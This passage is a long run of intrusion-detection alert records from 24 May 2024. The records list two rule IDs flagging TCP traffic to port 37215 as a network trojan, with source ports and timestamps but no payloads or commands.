              SID:2829579
              Source Port:46906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303169
              SID:2829579
              Source Port:48544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075428
              SID:2829579
              Source Port:36676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099553
              SID:2829579
              Source Port:49862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870293
              SID:2829579
              Source Port:38052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045462
              SID:2835222
              Source Port:44882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205270
              SID:2835222
              Source Port:48740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105738
              SID:2829579
              Source Port:48960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153061
              SID:2835222
              Source Port:53712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483548
              SID:2829579
              Source Port:53974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882402
              SID:2835222
              Source Port:42132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661932
              SID:2829579
              Source Port:39496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189422
              SID:2835222
              Source Port:39364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432204
              SID:2829579
              Source Port:41262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152867
              SID:2829579
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491564
              SID:2835222
              Source Port:60520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378075
              SID:2835222
              Source Port:54198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446477
              SID:2835222
              Source Port:53532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396079
              SID:2835222
              Source Port:55978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535989
              SID:2829579
              Source Port:57472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355151
              SID:2835222
              Source Port:50588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428800
              SID:2835222
              Source Port:42818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279587
              SID:2835222
              Source Port:58340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062222
              SID:2829579
              Source Port:43388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098135
              SID:2835222
              Source Port:33464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327816
              SID:2829579
              Source Port:49136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411919
              SID:2829579
              Source Port:57354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859519
              SID:2835222
              Source Port:55694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833206
              SID:2835222
              Source Port:53598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449945
              SID:2835222
              Source Port:60162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120404
              SID:2835222
              Source Port:44786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406598
              SID:2835222
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152975
              SID:2829579
              Source Port:48672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576449
              SID:2835222
              Source Port:37408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375026
              SID:2829579
              Source Port:57170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383380
              SID:2835222
              Source Port:59248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.579919
              SID:2835222
              Source Port:57684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341238
              SID:2829579
              Source Port:56778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118335
              SID:2835222
              Source Port:54318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396057
              SID:2829579
              Source Port:38952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752052
              SID:2829579
              Source Port:38584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700613
              SID:2835222
              Source Port:35234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423420
              SID:2835222
              Source Port:55032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280061
              SID:2835222
              Source Port:44734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303291
              SID:2835222
              Source Port:47254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692683
              SID:2835222
              Source Port:47070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279784
              SID:2835222
              Source Port:34418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396629
              SID:2835222
              Source Port:49224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450581
              SID:2835222
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547771
              SID:2829579
              Source Port:46302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060870
              SID:2835222
              Source Port:38726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128117
              SID:2835222
              Source Port:36016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186579
              SID:2829579
              Source Port:43112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662006
              SID:2835222
              Source Port:50918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152932
              SID:2829579
              Source Port:33560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535504
              SID:2829579
              Source Port:45884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797717
              SID:2835222
              Source Port:46074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064616
              SID:2835222
              Source Port:34148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267146
              SID:2829579
              Source Port:51392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128248
              SID:2835222
              Source Port:52806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797806
              SID:2835222
              Source Port:43926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600673
              SID:2829579
              Source Port:42910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118297
              SID:2835222
              Source Port:41308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535438
              SID:2829579
              Source Port:41674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308558
              SID:2835222
              Source Port:41772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097268
              SID:2829579
              Source Port:59956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209553
              SID:2829579
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578008
              SID:2835222
              Source Port:50926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425552
              SID:2835222
              Source Port:47742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857425
              SID:2829579
              Source Port:37444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152779
              SID:2829579
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506087
              SID:2835222
              Source Port:33882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071496
              SID:2835222
              Source Port:37658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334277
              SID:2829579
              Source Port:59858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602639
              SID:2835222
              Source Port:38274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474738
              SID:2835222
              Source Port:36416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864816
              SID:2829579
              Source Port:56130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450476
              SID:2829579
              Source Port:43408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878188
              SID:2829579
              Source Port:45796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460524
              SID:2829579
              Source Port:42672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494407
              SID:2829579
              Source Port:57840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049478
              SID:2835222
              Source Port:33278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279738
              SID:2829579
              Source Port:57968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831460
              SID:2835222
              Source Port:47114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148735
              SID:2835222
              Source Port:36682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535533
              SID:2829579
              Source Port:45222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725088
              SID:2835222
              Source Port:45582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625210
              SID:2835222
              Source Port:42250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289080
              SID:2835222
              Source Port:57194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187549
              SID:2835222
              Source Port:39680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624150
              SID:2835222
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.682413
              SID:2829579
              Source Port:59262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345358
              SID:2829579
              Source Port:48734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100973
              SID:2835222
              Source Port:34516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433527
              SID:2835222
              Source Port:60514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397266
              SID:2829579
              Source Port:45718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445812
              SID:2835222
              Source Port:35704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858320
              SID:2829579
              Source Port:54728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267148
              SID:2835222
              Source Port:52012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267223
              SID:2835222
              Source Port:37112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568233
              SID:2835222
              Source Port:51390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574810
              SID:2829579
              Source Port:46510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283530
              SID:2835222
              Source Port:46940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049215
              SID:2829579
              Source Port:49534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155817
              SID:2835222
              Source Port:56130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396740
              SID:2835222
              Source Port:52390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576556
              SID:2835222
              Source Port:44306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814778
              SID:2829579
              Source Port:33726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574720
              SID:2829579
              Source Port:45468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873932
              SID:2829579
              Source Port:39036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358917
              SID:2829579
              Source Port:56490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432542
              SID:2835222
              Source Port:42170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284166
              SID:2829579
              Source Port:41890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726573
              SID:2829579
              Source Port:45758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099866
              SID:2829579
              Source Port:48094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234477
              SID:2835222
              Source Port:43930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333794
              SID:2829579
              Source Port:42336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197435
              SID:2829579
              Source Port:37018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493086
              SID:2835222
              Source Port:51690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537633
              SID:2829579
              Source Port:41616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884602
              SID:2835222
              Source Port:60814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640902
              SID:2829579
              Source Port:46196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124053
              SID:2829579
              Source Port:60250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459944
              SID:2835222
              Source Port:58296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823052
              SID:2829579
              Source Port:42860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507083
              SID:2829579
              Source Port:52876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109310
              SID:2829579
              Source Port:45406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921207
              SID:2835222
              Source Port:36420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516332
              SID:2829579
              Source Port:41958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515568
              SID:2835222
              Source Port:41328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798853
              SID:2835222
              Source Port:58530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117136
              SID:2835222
              Source Port:48274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802540
              SID:2835222
              Source Port:55046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189047
              SID:2835222
              Source Port:37244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061477
              SID:2829579
              Source Port:56824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100674
              SID:2835222
              Source Port:55960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204872
              SID:2835222
              Source Port:53676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062701
              SID:2829579
              Source Port:43414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061338
              SID:2835222
              Source Port:57780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870161
              SID:2835222
              Source Port:57766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197455
              SID:2835222
              Source Port:51244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517863
              SID:2835222
              Source Port:57084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057284
              SID:2829579
              Source Port:41310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537242
              SID:2829579
              Source Port:38172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456913
              SID:2829579
              Source Port:49778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264699
              SID:2829579
              Source Port:57604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487010
              SID:2835222
              Source Port:36590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517904
              SID:2829579
              Source Port:57464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168574
              SID:2829579
              Source Port:42984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159811
              SID:2835222
              Source Port:48784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287906
              SID:2829579
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210166
              SID:2835222
              Source Port:51660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507221
              SID:2835222
              Source Port:37188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152707
              SID:2835222
              Source Port:53140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802580
              SID:2829579
              Source Port:46602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535477
              SID:2829579
              Source Port:48386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681012
              SID:2829579
              Source Port:37388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115942
              SID:2835222
              Source Port:46848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741305
              SID:2829579
              Source Port:34572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.080903
              SID:2829579
              Source Port:33786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542257
              SID:2829579
              Source Port:36394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637682
              SID:2835222
              Source Port:60248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624437
              SID:2829579
              Source Port:50672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831444
              SID:2829579
              Source Port:50590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601446
              SID:2835222
              Source Port:34734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764966
              SID:2835222
              Source Port:49464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.248888
              SID:2829579
              Source Port:44018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101616
              SID:2835222
              Source Port:49666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628130
              SID:2829579
              Source Port:39494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189489
              SID:2829579
              Source Port:59628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504849
              SID:2829579
              Source Port:54866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536034
              SID:2835222
              Source Port:48920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196903
              SID:2835222
              Source Port:45764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576524
              SID:2829579
              Source Port:38712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235730
              SID:2835222
              Source Port:35128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978251
              SID:2829579
              Source Port:47324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100963
              SID:2835222
              Source Port:53670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332247
              SID:2829579
              Source Port:43690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756220
              SID:2835222
              Source Port:59352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113696
              SID:2829579
              Source Port:50064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448676
              SID:2835222
              Source Port:60564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358471
              SID:2829579
              Source Port:44760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235569
              SID:2829579
              Source Port:54204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397211
              SID:2835222
              Source Port:42102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486134
              SID:2829579
              Source Port:46590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343679
              SID:2829579
              Source Port:52214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334269
              SID:2829579
              Source Port:47708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.632774
              SID:2829579
              Source Port:43436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118405
              SID:2829579
              Source Port:34620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574352
              SID:2829579
              Source Port:60096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204373
              SID:2835222
              Source Port:48452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482590
              SID:2835222
              Source Port:50034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535916
              SID:2829579
              Source Port:59932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979508
              SID:2835222
              Source Port:57230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752614
              SID:2835222
              Source Port:55318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685029
              SID:2829579
              Source Port:56722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040856
              SID:2829579
              Source Port:47542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764059
              SID:2835222
              Source Port:36350
              Destination Port:37215
